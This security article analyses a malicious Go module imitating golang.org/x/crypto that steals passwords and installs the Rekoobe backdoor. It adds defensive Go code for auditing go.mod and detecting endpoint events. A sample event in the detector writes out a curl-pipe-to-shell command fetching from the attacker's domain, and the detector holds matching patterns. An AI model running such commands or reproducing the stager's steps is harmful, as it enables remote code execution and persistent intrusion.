Malicious Go Crypto Module Steals Passwords and Deploys Rekoobe Backdoor in Developer Environments
A newly identified supply chain attack is targeting Go developers with a malicious module that masquerades as a legitimate and widely used cryptographic library. The module, named github[.]com/xinfei_soft/crypto, steals developer credentials and silently deploys the Rekoobe Linux backdoor onto affected systems. The campaign shows how attackers weaponize trusted dependency names inside a developer's everyday workflow.
The module gained traction by mimicking the popular and trusted golang.org/x/crypto repository. Researchers at Socket.dev found that the imposter, published as v0.15.0 and carrying a February 20, 2025 publication date, copies the exact structure of the original, including well-known subpackages such as bcrypt, argon2, acme, and ssh. The official golang.org/x/ modules are developed on go.googlesource.com and mirrored to github.com/golang/, so a GitHub-hosted module root with the familiar subpackage layout looks routine during code review and dependency checks.
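Because the imposter reproduces the package tree of golang.org/x/crypto, the only thing that distinguishes it in a dependency file is the module root. The following is an added example, not code from the report or from Socket: a stdlib-only Go auditor that parses go.mod (single-line and block `require` forms) and go.sum, flags the module root named in this report, and flags any other root that ends in a golang.org/x repository name but does not live under golang.org/x/. The sample go.mod and go.sum contents, the version numbers in them, and the `h1:PLACEHOLDER` sums are constructed for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// Repository names that live under golang.org/x/. A module path elsewhere that
// ends in one of these is not automatically malicious, but it is exactly the
// shape the imposter used and deserves a manual look.
var xRepoNames = map[string]bool{
	"crypto": true, "net": true, "sys": true, "term": true, "text": true,
	"tools": true, "mod": true, "oauth2": true, "sync": true, "time": true,
}

// Module roots already reported as malicious (only the one from this report).
var knownBad = map[string]bool{"github.com/xinfei_soft/crypto": true}

// Finding is one flagged module.
type Finding struct {
	Path, Version, Reason string
}

// check applies both heuristics to a single module path.
func check(path, version string) (Finding, bool) {
	if knownBad[path] {
		return Finding{path, version, "known malicious module root"}, true
	}
	last := path[strings.LastIndex(path, "/")+1:]
	if xRepoNames[last] && !strings.HasPrefix(path, "golang.org/x/") {
		return Finding{path, version, "shadows golang.org/x/" + last}, true
	}
	return Finding{}, false
}

// Requires extracts (path, version) pairs from go.mod text, in both the
// single-line and the "require ( ... )" block form. Comments, including
// "// indirect" markers, are dropped first. Stdlib only, so the auditor
// itself pulls in no third-party module.
func Requires(gomod string) [][2]string {
	var out [][2]string
	inBlock := false
	for _, raw := range strings.Split(gomod, "\n") {
		line := strings.TrimSpace(raw)
		if i := strings.Index(line, "//"); i >= 0 {
			line = strings.TrimSpace(line[:i])
		}
		f := strings.Fields(line)
		switch {
		case len(f) == 0:
		case inBlock && f[0] == ")":
			inBlock = false
		case inBlock && len(f) >= 2:
			out = append(out, [2]string{f[0], f[1]})
		case f[0] == "require" && len(f) == 2 && f[1] == "(":
			inBlock = true
		case f[0] == "require" && len(f) >= 3:
			out = append(out, [2]string{f[1], f[2]})
		}
	}
	return out
}

// Audit flags go.mod require entries.
func Audit(gomod string) []Finding {
	var findings []Finding
	for _, r := range Requires(gomod) {
		if f, ok := check(r[0], r[1]); ok {
			findings = append(findings, f)
		}
	}
	return findings
}

// AuditSum flags go.sum entries ("path version h1:..." and
// "path version/go.mod h1:..."), reporting each module version once.
func AuditSum(gosum string) []Finding {
	var findings []Finding
	seen := map[string]bool{}
	for _, line := range strings.Split(gosum, "\n") {
		f := strings.Fields(line)
		if len(f) < 3 {
			continue
		}
		path, version := f[0], strings.TrimSuffix(f[1], "/go.mod")
		if seen[path+"@"+version] {
			continue
		}
		seen[path+"@"+version] = true
		if fd, ok := check(path, version); ok {
			findings = append(findings, fd)
		}
	}
	return findings
}

// Constructed inputs for the example; versions and sums are placeholders.
const sampleGoMod = `module example.com/tool

go 1.22

require (
	github.com/xinfei_soft/crypto v0.15.0
	golang.org/x/crypto v0.31.0 // indirect
	github.com/spf13/cobra v1.8.0
)

require golang.org/x/sys v0.28.0
`

const sampleGoSum = `github.com/xinfei_soft/crypto v0.15.0 h1:PLACEHOLDER
github.com/xinfei_soft/crypto v0.15.0/go.mod h1:PLACEHOLDER
golang.org/x/crypto v0.31.0 h1:PLACEHOLDER
`

func main() {
	for _, f := range append(Audit(sampleGoMod), AuditSum(sampleGoSum)...) {
		fmt.Printf("%s %s: %s\n", f.Path, f.Version, f.Reason)
	}
}
```

The second heuristic also fires on github.com/golang/crypto, the real mirror. That is intentional: the mirror's go.mod declares its module path as golang.org/x/crypto, so the toolchain refuses to require it under the GitHub path, and any such entry that does appear in a dependency file was put there by hand and should be questioned.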
The Multi-Stage Backdoor Delivery Chain
The malicious code sits in the `ssh/terminal/terminal.go` file, inside the `ReadPassword` helper. Developer tools call this function to read secrets typed interactively, such as SSH passphrases, database logins, and API keys. `ReadPassword` takes a terminal file descriptor and disables echo while it reads, so it only succeeds on a real TTY; the backdoor therefore fires only in live interactive sessions, which keeps it quiet under automated testing and reduces the chance that a developer stumbles on it by accident.
When the compromised `ReadPassword` runs, it captures the typed password in plaintext and writes it to a local drop file at `/usr/share/nano/.lock`, a path chosen to look unremarkable. The module then fetches a staging pointer from an attacker-controlled GitHub repository, sends the stolen password to the endpoint that pointer resolves to, and finally downloads and runs a shell script through `/bin/sh`. Because the infrastructure URLs live in the staging pointer rather than in the module, the threat actor can move infrastructure without re-publishing the module.
The Go security team has since blocked the module at the public proxy, which now answers requests for it with a 403 SECURITY ERROR. The potential impact nonetheless remains substantial for organizations building Go software on Linux, including teams that manage cloud virtual machines, CI/CD pipelines, and administrative bastion hosts: any application that imports this module and calls `ReadPassword` hands the typed secret to the attacker before the application gets to hash, encrypt or otherwise protect it.
The rest of the delivery chain runs through several online resources. After the shell script launched from the compromised `ReadPassword` executes, it fetches `update.html` from the attacker's GitHub repository. That file is a redirect to `seed.php` on `img[.]spoolsv[.]cc`, which serves a `curl | sh` launcher that downloads and runs `snn50.txt`, the primary Linux stager. The stager prepares the host and delivers the final payload.
The `snn50.txt` stager takes three actions to establish persistent access and weaken the host's defenses. First, it appends an attacker-controlled SSH public key to `/home/ubuntu/.ssh/authorized_keys` (a path that exists only on hosts with the default `ubuntu` user, typical of cloud images), giving the actor remote access that survives a password change. Second, it sets the `iptables` default policies to `ACCEPT`, so any traffic not matched by an explicit rule is allowed through. Third, it downloads `sss.mp5` and `555.mp5` from `img[.]spoolsv[.]cc`; the media-like extensions are meant to get past superficial file inspection. Once executed, the files are deleted from disk to limit the forensic trail.
Socket.dev researchers identified `555.mp5` as a variant of the Rekoobe Linux backdoor, which has documented ties to the APT31 (Zirconium) threat group and shares part of its lineage with the Tiny SHell codebase. This Rekoobe sample talks to a command-and-control server at `154[.]84[.]63[.]184` on TCP port 443, but without a TLS handshake. The port choice lets the flow blend in with HTTPS in connection-level telemetry, while the payload appears to be custom encrypted traffic; the missing handshake is itself a distinguishing feature for any monitoring that inspects the TLS layer on port 443.
Organizations using Go should audit their `go.mod` and `go.sum` files for unexpected module roots and treat every new dependency as a security review item. Endpoint monitoring should flag writes to `/usr/share/nano/.lock`, unauthorized modifications to `authorized_keys` files, and any reset of `iptables` policies to `ACCEPT`. At the network level, block the domains `img[.]spoolsv[.]cc` and `img[.]spoolsv[.]net`. Finally, alert on processes that chain a GitHub Raw fetch with an outbound HTTP POST, since that pattern appears early in the delivery chain, before the final payload lands.
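The indicators above translate directly into detection logic. The following is an added example, not code from the report or from Socket: a Go detector that walks an ordered stream of endpoint events and raises the six indicators the report describes, including the per-process correlation of a GitHub Raw fetch followed by an HTTP POST. The `Event` shape, the sample stream, the PIDs, and the POST destination `203.0.113.10` are constructed for the example; real EDR or auditd records would need to be mapped onto these fields.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Event is one endpoint telemetry record in a constructed shape for this
// example. Kind selects which of the remaining fields are meaningful.
type Event struct {
	Seq     int    // ordering within the stream
	Pid     int    // originating process
	Kind    string // "exec", "write" or "http"
	Cmdline string // exec: full command line
	Path    string // write: file written or appended to
	Method  string // http: request method
	Host    string // http: destination host
}

// Alert is one matched indicator.
type Alert struct {
	Seq  int
	Pid  int
	Rule string
}

var (
	// Domains named in the report; block at DNS or the proxy and alert on any hit.
	blockedHosts = []string{"img.spoolsv.cc", "img.spoolsv.net"}
	// "iptables -P <chain> ACCEPT", the policy reset performed by the stager.
	iptablesAccept = regexp.MustCompile(`\biptables\b.*\s-P\s+(INPUT|OUTPUT|FORWARD)\s+ACCEPT\b`)
	// curl or wget output piped straight into a shell.
	pipeToShell = regexp.MustCompile(`\b(curl|wget)\b[^|]*\|\s*(/bin/)?(ba)?sh\b`)
)

// Detect runs the report's indicators over an ordered event stream.
func Detect(events []Event) []Alert {
	var alerts []Alert
	add := func(e Event, rule string) { alerts = append(alerts, Alert{e.Seq, e.Pid, rule}) }
	rawFetched := map[int]bool{} // pid -> fetched from GitHub Raw earlier in the stream
	for _, e := range events {
		switch e.Kind {
		case "write":
			switch {
			case e.Path == "/usr/share/nano/.lock":
				add(e, "credential-dropfile")
			case strings.HasSuffix(e.Path, "/.ssh/authorized_keys"):
				add(e, "authorized-keys-modified")
			}
		case "exec":
			if iptablesAccept.MatchString(e.Cmdline) {
				add(e, "iptables-policy-accept")
			}
			if pipeToShell.MatchString(e.Cmdline) {
				add(e, "pipe-to-shell")
			}
			for _, h := range blockedHosts {
				if strings.Contains(e.Cmdline, h) {
					add(e, "blocked-domain")
					break
				}
			}
		case "http":
			for _, h := range blockedHosts {
				if e.Host == h {
					add(e, "blocked-domain")
				}
			}
			if e.Host == "raw.githubusercontent.com" && e.Method == "GET" {
				rawFetched[e.Pid] = true
			} else if e.Method == "POST" && rawFetched[e.Pid] {
				// Staging-pointer fetch followed by a POST from the same process:
				// the shape of the credential exfiltration step.
				add(e, "raw-fetch-then-post")
			}
		}
	}
	return alerts
}

// SampleEvents is a constructed stream modelled on the chain described above:
// pid 3117 is the developer tool whose ReadPassword call was hijacked.
func SampleEvents() []Event {
	return []Event{
		{Seq: 1, Pid: 3117, Kind: "http", Method: "GET", Host: "raw.githubusercontent.com"},
		{Seq: 2, Pid: 3117, Kind: "write", Path: "/usr/share/nano/.lock"},
		{Seq: 3, Pid: 3117, Kind: "http", Method: "POST", Host: "203.0.113.10"},
		{Seq: 4, Pid: 3118, Kind: "exec", Cmdline: "/bin/sh -c curl -fsSL http://img.spoolsv.cc/seed.php | sh"},
		{Seq: 5, Pid: 3120, Kind: "exec", Cmdline: "iptables -P INPUT ACCEPT"},
		{Seq: 6, Pid: 3121, Kind: "write", Path: "/home/ubuntu/.ssh/authorized_keys"},
		{Seq: 7, Pid: 3122, Kind: "exec", Cmdline: "ls -la /tmp"},
	}
}

func main() {
	for _, a := range Detect(SampleEvents()) {
		fmt.Printf("seq=%d pid=%d %s\n", a.Seq, a.Pid, a.Rule)
	}
}
```

The fetch-then-POST rule is keyed on the process that did the fetch, which is what makes it useful as an early signal: the hijacked tool performs both requests itself, before any `curl` or stager appears on the host. On a real deployment the `authorized_keys` and drop-file rules should be fed from file-integrity or audit telemetry rather than from process command lines, since the stager appends with a redirect rather than a recognizable tool.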

